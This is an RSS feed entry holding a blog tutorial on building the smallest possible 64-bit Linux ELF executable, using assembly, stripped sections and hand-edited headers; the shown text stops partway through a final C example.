<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Sigreturn Labs Blog</title>
    <link>https://sigreturn.com/blog/</link>
    <description>Notes from the lab — research, writeups, and product updates from Sigreturn Labs.</description>
    <language>en</language>
    <lastBuildDate>Sun, 16 Jun 2024 12:00:00 +0000</lastBuildDate>
    <atom:link href="https://sigreturn.com/blog/feed.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Building the smallest ELF program</title>
      <link>https://sigreturn.com/blog/building-the-smallest-elf-program/</link>
      <guid isPermaLink="true">https://sigreturn.com/blog/building-the-smallest-elf-program/</guid>
      <pubDate>Sun, 16 Jun 2024 12:00:00 +0000</pubDate>
      <author>contact@sigreturn.com (Adam Taguirov)</author>
      <category>Reverse Engineering</category>
      <category>elf</category>
      <category>linux</category>
      <category>assembly</category>
      <category>x86-64</category>
      <description><![CDATA[<p>In this post we will have fun trying to create the smallest possible 64-bit Linux program (ELF binary) that simply outputs &ldquo;Hello world!&rdquo; when it is executed.</p>
<p>The idea here is to understand the compilation process, linking, how the loader works, how the <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">ELF file format</a> is structured, and so on.</p>
<h2>State of the art</h2>
<p>So let&rsquo;s simply create a program in C that outputs our string. In this default case we will not optimize anything nor try to reduce our binary size.</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;

void main(void)
{
    printf(&quot;Hello world!&quot;);
}
</code></pre>
<p>Let&rsquo;s compile it with <strong>GCC</strong> and run it:</p>
<pre><code class="language-bash">$ gcc smallest_elf.c -o smallest_elf.bin
$ ./smallest_elf.bin
Hello world!
</code></pre>
<p>Initial size: 16704 bytes.</p>
<p>The default compiled binary is quite big for only <strong>65</strong> bytes of source code. Why is that? Let&rsquo;s analyse our binary and check what we can remove to reduce its size.</p>
<h3>Too many sections</h3>
<pre><code>.interp
.note.gnu.propert
.note.gnu.build-i
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.data
.bss
.comment
.symtab
.strtab
.shstrtab
</code></pre>
<p>First of all, our binary has <strong>30</strong> sections, and we don&rsquo;t need all of them. We do not need relocations, symbols, PLT/GOT, or a lot of the other stuff. The compiler produced the same default layout it would produce for much longer code.</p>
<div class="admonition tip">
<p>Use <code>readelf</code> to see the ELF&rsquo;s sections: <code>readelf -S smallest_elf.bin</code></p>
</div>
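<p>For the curious, the section count reported by <code>readelf</code> can be read straight from the ELF header. Here is a minimal C sketch, assuming a little-endian 64-bit ELF and the <code>&lt;elf.h&gt;</code> header shipped with glibc. The helper name <code>elf64_section_count</code> is made up for this example. Keep in mind that <code>e_shnum</code> also counts the reserved null entry at index 0, so it may be one higher than the number of named sections.</p>
<pre><code class="language-c">#include &lt;elf.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* Return e_shnum from an in-memory ELF64 header, or -1 if the buffer is
   too short or does not start with the ELF magic. */
int elf64_section_count(const unsigned char *buf, size_t len)
{
    Elf64_Ehdr ehdr;

    if (len &lt; sizeof ehdr || memcmp(buf, ELFMAG, SELFMAG) != 0)
        return -1;
    memcpy(&amp;ehdr, buf, sizeof ehdr);   /* copy to avoid alignment issues */
    return ehdr.e_shnum;
}

int main(int argc, char **argv)
{
    unsigned char buf[sizeof(Elf64_Ehdr)];
    size_t n;
    FILE *f;

    if (argc != 2) {
        fprintf(stderr, &quot;usage: %s FILE\n&quot;, argv[0]);
        return 1;
    }
    f = fopen(argv[1], &quot;rb&quot;);
    if (f == NULL) {
        perror(&quot;fopen&quot;);
        return 1;
    }
    n = fread(buf, 1, sizeof buf, f);   /* only the 64-byte header is needed */
    fclose(f);
    printf(&quot;%d\n&quot;, elf64_section_count(buf, n));
    return 0;
}
</code></pre>
<p>Only the first 64 bytes of the file are read, because the whole ELF header fits in them.</p>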
<h3>Too many symbols</h3>
<pre><code>0000000000003dc8 d _DYNAMIC
0000000000003fb8 d _GLOBAL_OFFSET_TABLE_
0000000000002000 R _IO_stdin_used
                 w _ITM_deregisterTMCloneTable
                 w _ITM_registerTMCloneTable
000000000000215c r __FRAME_END__
0000000000002014 r __GNU_EH_FRAME_HDR
0000000000004010 D __TMC_END__
0000000000004010 B __bss_start
                 w __cxa_finalize@@GLIBC_2.2.5
0000000000004000 D __data_start
0000000000001100 t __do_global_dtors_aux
0000000000003dc0 d __do_global_dtors_aux_fini_array_entry
0000000000004008 D __dso_handle
0000000000003db8 d __frame_dummy_init_array_entry
                 w __gmon_start__
0000000000003dc0 d __init_array_end
0000000000003db8 d __init_array_start
00000000000011e0 T __libc_csu_fini
0000000000001170 T __libc_csu_init
                 U __libc_start_main@@GLIBC_2.2.5
0000000000004010 D _edata
0000000000004018 B _end
00000000000011e8 T _fini
0000000000001000 t _init
0000000000001060 T _start
0000000000004010 b completed.8061
0000000000004000 W data_start
0000000000001090 t deregister_tm_clones
0000000000001140 t frame_dummy
0000000000001149 T main
                 U printf@@GLIBC_2.2.5
00000000000010c0 t register_tm_clones
</code></pre>
<p>Our program has symbols: that&rsquo;s additional information we don&rsquo;t need to display our string.</p>
<div class="admonition tip">
<p>Use <code>nm</code> to see the ELF&rsquo;s symbols: <code>nm smallest_elf.bin</code></p>
</div>
<h3>Too much code</h3>
<p>First of all, the only executable section we need is <code>.text</code>, that&rsquo;s where our main code is. But we notice there are instructions outside this section:</p>
<pre><code>0000000000001000 &lt;.init&gt;:
    1000:   f3 0f 1e fa             endbr64
    1004:   48 83 ec 08             sub    rsp,0x8
    1008:   48 8b 05 d9 2f 00 00    mov    rax,QWORD PTR [rip+0x2fd9]
    100f:   48 85 c0                test   rax,rax
    1012:   74 02                   je     1016 &lt;__cxa_finalize@plt-0x2a&gt;
    1014:   ff d0                   call   rax
    1016:   48 83 c4 08             add    rsp,0x8
    101a:   c3                      ret
</code></pre>
<p>Also, there are <strong>388</strong> bytes of instructions in the <code>.text</code> section, which is a lot considering we just want to output &ldquo;Hello world!&rdquo;.</p>
<div class="admonition tip">
<p>Use <code>objdump</code> to see the ELF&rsquo;s executable section&rsquo;s instructions: <code>objdump -d smallest_elf.bin</code></p>
</div>
<h3>Too much empty space</h3>
<p>We also notice something interesting in our binary: there is a <strong>lot</strong> of empty space, filled with zeroes.</p>
<pre><code>00000600: 0000 0000 0000 0000 0000 0000 0000 0000
00000610: 0000 0000 0000 0000 0000 0000 0000 0000
00000620: 0000 0000 0000 0000 0000 0000 0000 0000
00000630: 0000 0000 0000 0000 0000 0000 0000 0000
00000640: 0000 0000 0000 0000 0000 0000 0000 0000
00000650: 0000 0000 0000 0000 0000 0000 0000 0000
00000660: 0000 0000 0000 0000 0000 0000 0000 0000
00000670: 0000 0000 0000 0000 0000 0000 0000 0000
[...]
</code></pre>
<p>For example the space above has <strong>2544</strong> bytes of zeroes in total. There are several empty spaces like this.</p>
<div class="admonition tip">
<p>Use <code>xxd</code> to see a file&rsquo;s hexadecimal data: <code>xxd smallest_elf.bin</code></p>
</div>
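<p>To put a number on that empty space, we can simply count the zero bytes in the file. This is a small C sketch of the idea, nothing more: the helper name <code>count_zero_bytes</code> is hypothetical, and it counts <em>every</em> zero byte, including the ones that are legitimately part of headers or instructions.</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;

/* Count the bytes equal to zero in buf[0..len). */
size_t count_zero_bytes(const unsigned char *buf, size_t len)
{
    size_t zeros = 0;

    for (size_t i = 0; i &lt; len; i++)
        if (buf[i] == 0)
            zeros++;
    return zeros;
}

int main(int argc, char **argv)
{
    unsigned char chunk[4096];
    size_t n, total = 0, zeros = 0;
    FILE *f;

    if (argc != 2) {
        fprintf(stderr, &quot;usage: %s FILE\n&quot;, argv[0]);
        return 1;
    }
    f = fopen(argv[1], &quot;rb&quot;);
    if (f == NULL) {
        perror(&quot;fopen&quot;);
        return 1;
    }
    /* Read the file chunk by chunk and accumulate both counters. */
    while ((n = fread(chunk, 1, sizeof chunk, f)) != 0) {
        total += n;
        zeros += count_zero_bytes(chunk, n);
    }
    fclose(f);
    printf(&quot;%zu of %zu bytes are zero\n&quot;, zeros, total);
    return 0;
}
</code></pre>
<p>Running it on each intermediate binary gives a quick way to see how much padding every step removes.</p>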
<h2>Quick optimizations</h2>
<p>Let&rsquo;s now try to reduce our executable&rsquo;s size. We will apply several methods so you can get an idea of what can be done to produce the smallest possible binary by manipulating the compiled binary.</p>
<h3>Strip symbols</h3>
<p>First of all, let&rsquo;s remove all the symbols and relocation information from the executable.</p>
<pre><code class="language-bash">$ strip -s smallest_elf.bin
$ nm smallest_elf.bin
nm: smallest_elf.bin: no symbols
</code></pre>
<div class="admonition tip">
<p>Use <code>strip</code> to strip an executable from all its symbols and relocation information: <code>strip -s smallest_elf.bin</code></p>
</div>
<p>After the operation, the size of the binary goes from <strong>16704</strong> to <strong>14472</strong> bytes.</p>
<p>New size: 14472 bytes.</p>
<h3>Remove unnecessary sections</h3>
<p>We can also remove some sections that are unnecessary to the main task of our program, for example <code>.data</code> or <code>.gnu.version</code>.</p>
<p>Indeed, we do not need those sections: for example, our string &ldquo;Hello world!&rdquo; is already stored in the <code>.rodata</code> section:</p>
<pre><code>00002000: 0100 0200 4865 6c6c 6f20 776f 726c 6421  ....Hello world!
</code></pre>
<div class="admonition tip">
<p>Use <code>objcopy</code> to remove a specific section from an ELF executable: <code>objcopy --remove-section .data smallest_elf.bin</code></p>
</div>
<h2>Major modifications</h2>
<p>Let&rsquo;s now try to reduce our executable&rsquo;s size even more. We will apply several methods so you can get an idea of what can be done to produce the smallest possible binary while still keeping its initial function: displaying a string.</p>
<div class="admonition warning">
<p>Keep in mind that we&rsquo;re doing this for fun, and for the technical challenge. In real life, you should not release programs that you have modified that way.</p>
</div>
<h3>Get rid of programming language</h3>
<p>We all know that programming languages are converted to assembly language by the compiler during the compilation process, and that the code can even be optimized automatically. The output may still contain more instructions than our task needs.</p>
<p>Let&rsquo;s re-write our code in assembly language!</p>
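<pre><code class="language-asm">section .data
    msg:    db &quot;Hello world&quot;, 33, 10, 0    ; &quot;Hello world!&quot;, newline, NUL terminator
    format: db &quot;%s&quot;, 10, 0                 ; defined but never referenced below

section .text
    global main

main:
    extern printf
    push rbp            ; set up a stack frame
    mov rbp, rsp
    mov rdi, msg        ; first argument: our string, used as the format
    call printf
    pop rbp             ; tear the frame down
    ret
</code></pre>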
<p>We assemble the code with <code>nasm</code> then link the object with <code>gcc</code> then run it.</p>
<pre><code class="language-bash">$ nasm -f elf64 smallest_elf.asm &amp;&amp; gcc smallest_elf.o -o smallest_elf.bin -no-pie
$ ./smallest_elf.bin
Hello world!
</code></pre>
<p>New size: 14368 bytes.</p>
<p>We only reduced our file size by <strong>104</strong> bytes by completely rewriting it in assembly. Why?</p>
<p>Well by giving the assembled code object to <code>gcc</code> we only told it what the <code>.text</code> content should look like, but all the other sections and additional data are still here. In order to get rid of it, we will have to link our binary ourselves, getting rid of <code>gcc</code> routines.</p>
<h2>Getting straight to the point</h2>
<p>We have rewritten the whole program in assembly and linked it with GCC, but we&rsquo;re kind of stuck here. How do we reduce the size even more? Maybe by trying another compiler? By reducing the code even more?</p>
<p>Let&rsquo;s get straight to the point: we need the program to display &ldquo;Hello world!&rdquo;, that&rsquo;s it. We don&rsquo;t want external dependencies like the <code>printf()</code> function.</p>
<p>Let&rsquo;s rewrite the whole assembly code and remove all external references and symbols!</p>
<h3>Removing external references</h3>
<p>We will make the following changes to our assembly code:</p>
<ul>
<li>Removing any call to external functions like <code>printf()</code>. Instead, we&rsquo;ll use direct system calls like <code>write()</code> and <code>exit()</code>.</li>
<li>Removing references to a &ldquo;main&rdquo; function, we don&rsquo;t need that, we don&rsquo;t need &ldquo;functions&rdquo; in our program.</li>
<li>Removing prologues, epilogues, and stack frames: yes, those useless bytes at the beginning and end of our code, why would we need them here?</li>
<li>The whole code will be strictly about printing our buffer and exiting the program.</li>
</ul>
<pre><code class="language-asm">global _start

section .data
        msg:    db &quot;Hello world&quot;, 33, 10, 0

section .text

_start:
        mov rdi, 1      ; standard output
        mov rsi, msg    ; buffer to print
        mov rdx, 14     ; size of the buffer

        mov rax, 1      ; set write syscall

        syscall         ; call write

        mov rdi, 0      ; value to return
        mov rax, 0x3C   ; set exit syscall

        syscall         ; call exit
</code></pre>
<div class="admonition note">
<p>You can notice that I&rsquo;m using the exit system call to properly stop the program after printing the buffer. Otherwise, the program would crash, although the buffer would still be printed. It is up to you to decide whether the crash matters in this exercise.</p>
<p>In my case, I chose to consider the program should always properly exit.</p>
</div>
<h3>Get rid of compilers</h3>
<p>We don&rsquo;t have any C code anymore, why would we even need a compiler? Let&rsquo;s get rid of <code>gcc</code> and directly link the code ourselves.</p>
<pre><code class="language-bash">$ nasm -f elf64 smallest_elf.asm
$ ld -m elf_x86_64 smallest_elf.o -o smallest_elf.bin
</code></pre>
<p>Let&rsquo;s run it and check:</p>
<pre><code class="language-bash">$ ./smallest_elf.bin
Hello world!
</code></pre>
<p>With the rewritten assembly code and linking without using any compiler, we reduced the size to <strong>8488</strong> bytes.</p>
<p>New size: 8488 bytes.</p>
<h3>Get rid of the data section</h3>
<p>We initially put our &ldquo;Hello world!&rdquo; string in the <code>.data</code> section, but at this point we&rsquo;re not following any convention and we&rsquo;ll just remove the <code>.data</code> section to put our string directly inside the <code>.text</code> code section. Yeah it&rsquo;s a bit weird but don&rsquo;t worry, it will work.</p>
<pre><code class="language-asm">global _start

section .text

_start:
        mov rdi, 1      ; standard output
        mov rsi, msg    ; buffer to print
        mov rdx, 14     ; size of the buffer

        mov rax, 1      ; set write syscall

        syscall         ; call write

        mov rdi, 0      ; value to return
        mov rax, 0x3C   ; set exit syscall

        syscall         ; call exit
msg:
        db      &quot;Hello world&quot;, 33, 10, 0
</code></pre>
<p>With this small manipulation, we manage to cut the previous size of the binary roughly in half!</p>
<p>New size: 4360 bytes.</p>
<h3>Analysing the situation</h3>
<p>We did pretty much everything we could to reduce the binary size:</p>
<ul>
<li>Writing directly assembly code</li>
<li>No external function, no stack frames, only code section</li>
<li>No compiler, directly linking</li>
<li>Stripping the symbols</li>
</ul>
<p>At this point, there isn&rsquo;t much more we can do in a conventional way to reduce the binary size. By the way, why is it still that big?</p>
<p>With the <code>readelf</code> command we can see that our binary still has a lot of stuff inside of it. We have the <code>.shstrtab</code> section header, and a <strong>huge</strong> amount of empty space, because some tables and sections have been encoded as &ldquo;empty spaces&rdquo; filled with null bytes in the binary.</p>
<p>Nearly <strong>92%</strong> of our binary is filled with useless empty spaces.</p>
<p>Check the binary composition with <code>readelf -a smallest_elf.bin</code> and the actual data in hexadecimal with <code>xxd smallest_elf.bin</code>. Notice all the zero bytes.</p>
<h2>Going further</h2>
<p>The linking process produces this kind of ELF binary, padded with a lot of empty space that simply increases our binary size.</p>
<p>From now on we will build our binary ourselves, manually, without relying on the assembler or the linker.</p>
<h3>Identifying the needed information</h3>
<p>There is a lot of useless information in our binary, so let&rsquo;s start by identifying strictly what we need:</p>
<ul>
<li>The ELF header, otherwise the file would not be considered an ELF by the system and could not be loaded</li>
<li>Our actual code</li>
</ul>
<p>This portion at the beginning is our header:</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 0010 4000 0000 0000  ..&gt;.......@.....
00000020: 4000 0000 0000 0000 4810 0000 0000 0000  @.......H.......
00000030: 0000 0000 4000 3800 0200 4000 0300 0200  ....@.8...@.....
00000040: 0100 0000 0400 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000                      ........
</code></pre>
<p>And this portion is our code:</p>
<pre><code>00001000: bf01 0000 0048 be27 1040 0000 0000 00ba  .....H.'.@......
00001010: 0e00 0000 b801 0000 000f 05bf 0000 0000  ................
00001020: b83c 0000 000f 0548 656c 6c6f 2077 6f72  .&lt;.....Hello wor
00001030: 6c64 210a 00                             ld!..
</code></pre>
<p>And that&rsquo;s it, we don&rsquo;t really care about the rest.</p>
<p>Let&rsquo;s manually construct our new binary with only these two blocks of data. Use any method you like to do that, I used simple Linux commands.</p>
<pre><code class="language-bash">$ head -c 120 smallest_elf.bin &gt; new_smallest_elf.bin.header # extract header
$ tail -c 264 smallest_elf.bin &gt; tmp.bin # extract end of file starting from our code
$ head -c 53 tmp.bin &gt; new_smallest_elf.bin.code # extract our code from it
$ cat new_smallest_elf.bin.header new_smallest_elf.bin.code &gt; new_smallest_elf.bin # assemble both blocks into one final ELF executable
</code></pre>
<p>So this is what we get:</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 0010 4000 0000 0000  ..&gt;.......@.....
00000020: 4000 0000 0000 0000 4810 0000 0000 0000  @.......H.......
00000030: 0000 0000 4000 3800 0200 4000 0300 0200  ....@.8...@.....
00000040: 0100 0000 0400 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 bf01 0000 0048 be27  .............H.'
00000080: 1040 0000 0000 00ba 0e00 0000 b801 0000  .@..............
00000090: 000f 05bf 0000 0000 b83c 0000 000f 0548  .........&lt;.....H
000000a0: 656c 6c6f 2077 6f72 6c64 210a 00         ello world!..
</code></pre>
<p>Obviously, a lot of information from the headers is inaccurate since we modified the whole structure of the file and the program will not execute:</p>
<pre><code class="language-bash">$ ./new_smallest_elf.bin
-bash: ./new_smallest_elf.bin: cannot execute binary file: Exec format error
</code></pre>
<p>Let&rsquo;s check what&rsquo;s happening with <code>readelf</code>:</p>
<pre><code class="language-bash">$ readelf -a new_smallest_elf.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x401000
  Start of program headers:          64 (bytes into file)
  Start of section headers:          4168 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         2
  Size of section headers:           64 (bytes)
  Number of section headers:         3
  Section header string table index: 2
readelf: Error: Reading 192 bytes extends past end of file for section headers
readelf: Error: Section headers are not available!
readelf: Error: Reading 112 bytes extends past end of file for program headers

There is no dynamic section in this file.
readelf: Error: Reading 112 bytes extends past end of file for program headers
</code></pre>
<p>Several issues identified here:</p>
<ul>
<li>Entry point address incorrect: our new code starts at offset <strong>0x78</strong>, not <strong>0x1000</strong>.</li>
<li>Start of section headers incorrect: we do not have any section header, this should be <strong>zero</strong>.</li>
<li>Number of program headers incorrect: we only have <strong>1</strong> program header and not <strong>2</strong>.</li>
<li>Size of section headers incorrect: we do not have any section header, this should be <strong>zero</strong>.</li>
<li>Number of section headers incorrect: we do not have any section header, this should be <strong>zero</strong>.</li>
<li>Section header string table index: we do not have any section header, this should be <strong>zero</strong>.</li>
</ul>
<p>We also need to adjust several things in the program header:</p>
<ul>
<li>The virtual address of the segment needs to be changed from <strong>0x400000</strong> to <strong>0x400078</strong> because this is where our program starts, and the file offset of the segment moves from <strong>0</strong> to <strong>0x78</strong> accordingly. Not aligned? We don&rsquo;t care.</li>
<li>The permissions of the segment in the program header are read-only (<strong>0x004</strong>) and need to be readable, writable and executable for simplicity (<strong>0x007</strong>).</li>
</ul>
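<p>The same fixes can be expressed with the structures from <code>&lt;elf.h&gt;</code> rather than raw hexadecimal offsets. The following C program is only a sketch of that idea, assuming a little-endian x86-64 host and a file that starts with the 64-byte ELF header followed by one 56-byte program header. The helper <code>patch_headers</code> and the two constants are names I made up for illustration.</p>
<pre><code class="language-c">#include &lt;elf.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

#define CODE_OFFSET 0x78u       /* where our code now starts in the file */
#define IMAGE_BASE  0x400000u   /* base address found in the original header */

/* Apply the fixes listed above to a 120-byte block made of the ELF
   header followed by a single program header. */
void patch_headers(unsigned char *blob)
{
    Elf64_Ehdr ehdr;
    Elf64_Phdr phdr;

    memcpy(&amp;ehdr, blob, sizeof ehdr);
    memcpy(&amp;phdr, blob + sizeof ehdr, sizeof phdr);

    ehdr.e_entry     = IMAGE_BASE + CODE_OFFSET;   /* 0x400078 */
    ehdr.e_shoff     = 0;                          /* no section headers */
    ehdr.e_phnum     = 1;                          /* one program header */
    ehdr.e_shentsize = 0;
    ehdr.e_shnum     = 0;
    ehdr.e_shstrndx  = 0;

    phdr.p_offset = CODE_OFFSET;
    phdr.p_vaddr  = IMAGE_BASE + CODE_OFFSET;
    phdr.p_flags  = PF_R | PF_W | PF_X;            /* 0x7 */

    memcpy(blob, &amp;ehdr, sizeof ehdr);
    memcpy(blob + sizeof ehdr, &amp;phdr, sizeof phdr);
}

int main(int argc, char **argv)
{
    unsigned char blob[sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr)];
    FILE *f;

    if (argc != 2) {
        fprintf(stderr, &quot;usage: %s FILE\n&quot;, argv[0]);
        return 1;
    }
    f = fopen(argv[1], &quot;r+b&quot;);   /* patch the file in place */
    if (f == NULL) {
        perror(&quot;fopen&quot;);
        return 1;
    }
    if (fread(blob, 1, sizeof blob, f) != sizeof blob) {
        fprintf(stderr, &quot;file too short\n&quot;);
        fclose(f);
        return 1;
    }
    patch_headers(blob);
    rewind(f);                   /* required between a read and a write */
    if (fwrite(blob, 1, sizeof blob, f) != sizeof blob) {
        perror(&quot;fwrite&quot;);
        fclose(f);
        return 1;
    }
    fclose(f);
    return 0;
}
</code></pre>
<p>Since the program overwrites the first 120 bytes of the file it is given, it is safer to run it on a copy.</p>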
<p>We manually apply all those modifications directly through a hexadecimal editor and run <code>readelf</code> again:</p>
<pre><code class="language-bash">$ readelf -a new_smallest_elf.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000078 0x0000000000400078 0x0000000000400000
                 0x00000000000000b0 0x00000000000000b0  RWE    0x1000

There is no dynamic section in this file.

There are no relocations in this file.
No processor specific unwind information to decode

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.
</code></pre>
<p>This time, no error. But we still need to adjust one small detail inside our actual code. We assembled the code before making all those modifications, and the call to <code>write</code>, <code>write(1, buffer, 14);</code>, still uses the old, hard-coded address of the buffer.</p>
<p>Indeed, the &ldquo;Hello world!&rdquo; buffer is no longer located at offset <strong>0x1027</strong>, the new offset is <strong>0x9f</strong>. The address loaded into <code>rsi</code> therefore has to change from <strong>0x401027</strong> to <strong>0x40009f</strong>.</p>
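<p>The arithmetic behind that address is short enough to write down. In this C sketch, the helper <code>file_offset_to_vaddr</code> is a hypothetical name, and the &ldquo;before&rdquo; values assume that the original code segment was mapped from file offset 0x1000 to address 0x401000, which is consistent with the original entry point.</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

/* Address at which a byte of the file ends up in memory, for a segment
   loaded from file offset p_offset at virtual address p_vaddr. */
uint64_t file_offset_to_vaddr(uint64_t file_off, uint64_t p_offset,
                              uint64_t p_vaddr)
{
    return p_vaddr + (file_off - p_offset);
}

int main(void)
{
    /* Before: string at file offset 0x1027 (assumed segment 0x1000 / 0x401000). */
    uint64_t before = file_offset_to_vaddr(0x1027, 0x1000, 0x401000);
    /* After: string at file offset 0x9f, segment at 0x78 / 0x400078. */
    uint64_t after = file_offset_to_vaddr(0x9f, 0x78, 0x400078);

    printf(&quot;before: 0x%llx\n&quot;, (unsigned long long)before);   /* 0x401027 */
    printf(&quot;after:  0x%llx\n&quot;, (unsigned long long)after);    /* 0x40009f */
    return 0;
}
</code></pre>
<p>Both results match the operand of the <code>48 be</code> instruction in the dumps: <code>27 10 40 00</code> before, <code>9f 00 40 00</code> after.</p>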
<p>Here is the final modified binary (modified bytes versus the previous dump):</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..&gt;.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0700 0000 7800 0000 0000 0000  ........x.......
00000050: 7800 4000 0000 0000 0000 4000 0000 0000  x.@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 bf01 0000 0048 be9f  .............H..
00000080: 0040 0000 0000 00ba 0e00 0000 b801 0000  .@..............
00000090: 000f 05bf 0000 0000 b83c 0000 000f 0548  .........&lt;.....H
000000a0: 656c 6c6f 2077 6f72 6c64 210a            ello world!.
</code></pre>
<p>Let&rsquo;s test it now:</p>
<pre><code class="language-bash">$ ./new_smallest_elf.bin
Hello world!
</code></pre>
<p>New size: 172 bytes.</p>
<p>We have hit a new record by reducing our initial program size from <strong>16704</strong> to only <strong>172</strong> bytes.</p>
<p>We could call it a day, but hey, can we actually do better?</p>
<h2>Going even further</h2>
<p>Let&rsquo;s try to shrink our executable even more. To do that, let&rsquo;s slightly change the initial exercise: we no longer need to display the &ldquo;Hello world!&rdquo; string, we just want to build <strong>any</strong> ELF executable, as small as possible.</p>
<p>In order to be considered a valid executable:</p>
<ul>
<li>It must execute at least one assembly instruction</li>
<li>It must not crash</li>
</ul>
<p>Let&rsquo;s take our functional header and remove all the custom code at offset <strong>0x78</strong>. We will append new code there.</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..&gt;.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0700 0000 7800 0000 0000 0000  ........x.......
00000050: 7800 4000 0000 0000 0000 4000 0000 0000  x.@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000                      ........
</code></pre>
<h3>Smallest possible code</h3>
<p>Considering the previous conditions, our new code must include a routine to properly exit the program. We could try something like this:</p>
<pre><code class="language-asm">mov rax, 0x3C   ; set exit syscall
syscall         ; call exit
</code></pre>
<p>Yes, we did omit the <code>rdi</code> register containing the value to be returned by the program. We don&rsquo;t really care, the return value is not a condition. We&rsquo;ll let the program return whatever will be in the register.</p>
<p>Once converted to opcodes we get <code>b8 3c 00 00 00 0f 05</code>, so <strong>7</strong> bytes. Instead of using a <code>mov</code> instruction, let&rsquo;s use <code>push</code> and <code>pop</code> for the same result.</p>
<pre><code class="language-asm">push 0x3C       ; set exit syscall
pop rax
syscall         ; call exit
</code></pre>
<p>This gets us the opcodes <code>6a 3c 58 0f 05</code> (<strong>5</strong> bytes) which is slightly better, we&rsquo;ll stick with that one. Let&rsquo;s append it to our header and run it!</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..&gt;.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0700 0000 7800 0000 0000 0000  ........x.......
00000050: 7800 4000 0000 0000 0000 4000 0000 0000  x.@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 6a3c 580f 05         ........j&lt;X..
</code></pre>
<p>We notice that the program runs fine and even returns the default <strong>zero</strong> value.</p>
<pre><code class="language-bash">$ ./smallest_elf_v2.bin
$ echo $?
0
</code></pre>
<p>New size: 125 bytes.</p>
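<p>Instead of gluing bytes together by hand, the 125-byte file above could also be generated from the <code>&lt;elf.h&gt;</code> structures. This C sketch reproduces the field values visible in the dump, including the <code>0xb0</code> sizes left over from the previous version. It assumes a little-endian x86-64 host, and <code>build_tiny_elf</code> is a name invented for this example.</p>
<pre><code class="language-c">#include &lt;elf.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

#define HDR_SIZE (sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr))   /* 0x78 */

/* push 0x3c ; pop rax ; syscall */
static const unsigned char code[] = { 0x6a, 0x3c, 0x58, 0x0f, 0x05 };

/* Fill out[] with the two headers followed by the code bytes and
   return the number of bytes written. */
size_t build_tiny_elf(unsigned char *out)
{
    Elf64_Ehdr ehdr;
    Elf64_Phdr phdr;

    memset(&amp;ehdr, 0, sizeof ehdr);
    memset(&amp;phdr, 0, sizeof phdr);

    memcpy(ehdr.e_ident, ELFMAG, SELFMAG);
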